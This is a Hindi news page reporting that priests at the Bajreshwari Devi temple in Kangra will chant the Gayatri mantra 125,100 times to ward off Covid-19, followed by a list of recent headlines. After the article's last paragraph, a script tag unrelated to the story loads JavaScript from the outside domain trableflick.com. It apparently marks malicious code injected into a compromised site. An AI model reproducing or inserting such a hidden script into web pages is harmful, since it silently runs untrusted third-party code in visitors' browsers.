Categories: हिमाचल

कोरोना संक्रमण से बचाव के लिए बज्रेश्वरी मंदिर में 1.25 लाख बार होगा गायत्री जाप

<p>वैश्विक महामारी कोरोना संक्रमण से बचाव के लिए शक्तिपीठ बज्रेश्वरी देवी मंदिर कांगड़ा में गायत्री जाप होगा। मंदिर आयुक्त एवं डीसी कांगड़ा राकेश प्रजापति ने आयोजन के लिए अनुमति दे दी है। मंदिर में 21 से 26 नवंबर तक गायत्री जाप होगा। छह पुजारी लगातार छह दिन तक 1 लाख 25 हजार 100 बार गायत्री मंत्र का जाप करेंगे और 26 नवंबर को हवन के साथ पूर्णाहुति डाली जाएगी। मंदिर के वरिष्ठ पुजारी पंडित रामप्रसाद शर्मा ने बताया कि सनातन धर्म में गायत्री मंत्र औऱ जाप का अहम महत्व है। किसी भी संकट से उभरने के लिए गायत्री जाप किया जाता है। उन्होंने कहा गायत्री मंत्र का 1 लाख 25 हजार 100 बार जाप करना आसान नहीं है।</p>

<p>मंदिर के सहायक आयुक्त और एसडीएम कांगड़ा अभिषेक वर्मा ने बताया कि इस संकट के समय गायत्री जाप सहायक होगा। हिमाचल प्रदेश में कोरोना संक्रमण के मामलों में एक बार फ&zwj;िर से तेजी से बढ़ोतरी होने लगी है। सितंबर और अक्&zwj;टूबर माह में कोरोना संक्रमण के मामलों में कुछ स्थिरता आई थी। लेकिन त्&zwj;योहारी सीजन के बीच सर्दी के मौसम की दस्&zwj;तक से मामलों में तेजी से बढ़ौतरी हुई है। कोरोना संकट से देश दुनिया को उभारने के लिए बज्रेश्&zwj;वरी देवी मंदिर में यह खास आयोजन किया जा रहा है।&nbsp; &nbsp;</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

5 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

5 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

6 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

7 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

7 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

8 hours ago